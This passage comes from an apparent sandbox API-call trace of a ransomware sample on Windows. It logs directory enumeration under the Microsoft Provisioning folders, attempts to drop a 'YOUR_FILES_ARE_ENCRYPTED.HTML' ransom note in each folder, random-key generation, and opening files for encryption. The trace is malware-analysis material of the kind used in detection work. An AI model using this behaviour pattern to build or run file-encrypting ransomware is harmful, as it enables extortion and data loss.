users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0110.097] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=313) returned 1 [0110.097] CloseHandle (hObject=0x32c) returned 1 [0110.097] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaee02646, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaee02646, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaee060bb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.097] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaee02646, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaee02646, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaee060bb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.097] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0110.098] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0110.098] GetProcessHeap () returned 0x600000 [0110.098] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.098] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.098] GetProcessHeap () returned 0x600000 [0110.098] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.098] GetProcessHeap () returned 0x600000 [0110.098] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.099] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaee09b24, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaee09b24, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaee0d55d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.099] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaee09b24, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaee09b24, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaee0d55d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.099] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0110.099] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0110.099] GetProcessHeap () returned 0x600000 [0110.099] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.100] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.100] GetProcessHeap () returned 0x600000 [0110.100] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.100] GetProcessHeap () returned 0x600000 [0110.100] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.100] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaee3f5fc, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaee3f5fc, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}", cAlternateFileName="{B0B91~1")) returned 1 [0110.101] StrStrIW (lpFirst="{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.101] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}") returned 84 [0110.101] GetProcessHeap () returned 0x600000 [0110.101] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.101] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}" [0110.101] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*" [0110.102] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaee3f5fc, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaee62d6b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.102] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaee3f5fc, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaee62d6b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0110.102] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0d7b677, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0d7b677, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xaee4391d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x8a0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="customizations.xml.5DE914BBC4F858BA40E268DBEED7326C1EEFB74F7CE073687FB876503A916C48", cAlternateFileName="CUSTOM~1.5DE")) returned 1 [0110.102] StrStrIW (lpFirst="customizations.xml.5DE914BBC4F858BA40E268DBEED7326C1EEFB74F7CE073687FB876503A916C48", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.102] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml.5DE914BBC4F858BA40E268DBEED7326C1EEFB74F7CE073687FB876503A916C48") returned 168 [0110.102] PathFindExtensionW (pszPath="customizations.xml.5DE914BBC4F858BA40E268DBEED7326C1EEFB74F7CE073687FB876503A916C48") returned=".5DE914BBC4F858BA40E268DBEED7326C1EEFB74F7CE073687FB876503A916C48" [0110.102] lstrlenW (lpString=".5DE914BBC4F858BA40E268DBEED7326C1EEFB74F7CE073687FB876503A916C48") returned 65 [0110.102] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0d2f19c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0d2f19c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0d2f19c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0110.102] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.102] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml") returned 104 [0110.102] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.102] lstrlenW (lpString=".xml") returned 4 [0110.102] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.102] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0110.102] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0110.102] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=271) returned 1 [0110.102] CloseHandle (hObject=0x30c) returned 1 [0110.103] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="Prov", cAlternateFileName="")) returned 1 [0110.103] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.103] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov") returned 89 [0110.103] GetProcessHeap () returned 0x600000 [0110.103] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.104] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov" [0110.104] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\*" [0110.104] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaee5a43e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0110.104] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaee5a43e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="..", cAlternateFileName="")) returned 1 [0110.104] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime", cAlternateFileName="")) returned 1 [0110.104] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.104] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime") returned 97 [0110.104] GetProcessHeap () returned 0x600000 [0110.104] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.105] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime" [0110.105] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\*" [0110.105] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaee4e093, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f40dc, dwReserved1=0x6f4028, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.105] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaee4e093, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f40dc, dwReserved1=0x6f4028, cFileName="..", cAlternateFileName="")) returned 1 [0110.105] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0ce2cc2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0ce2cc2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0d08f31, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x663, dwReserved0=0x6f40dc, dwReserved1=0x6f4028, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0110.105] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.105] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml") returned 113 [0110.105] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.105] lstrlenW (lpString=".provxml") returned 8 [0110.105] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.105] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaee4e093, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaee4e093, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaee51b1c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f40dc, dwReserved1=0x6f4028, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.105] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaee4e093, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaee4e093, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaee51b1c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f40dc, dwReserved1=0x6f4028, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.105] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.106] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0110.106] GetProcessHeap () returned 0x600000 [0110.106] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.106] GetProcessHeap () returned 0x600000 [0110.106] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.106] GetProcessHeap () returned 0x600000 [0110.106] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.107] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0d08f31, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0d08f31, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0d2f19c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x15c, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0110.107] StrStrIW (lpFirst="RunTime.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.107] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml") returned 101 [0110.107] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0110.107] lstrlenW (lpString=".xml") returned 4 [0110.107] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0110.107] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0110.107] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0110.107] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=348) returned 1 [0110.108] CloseHandle (hObject=0x32c) returned 1 [0110.108] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaee5932b, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaee5932b, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaee5e0ae, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.108] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaee5932b, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaee5932b, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaee5e0ae, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.108] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0110.108] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0110.108] GetProcessHeap () returned 0x600000 [0110.108] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.108] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 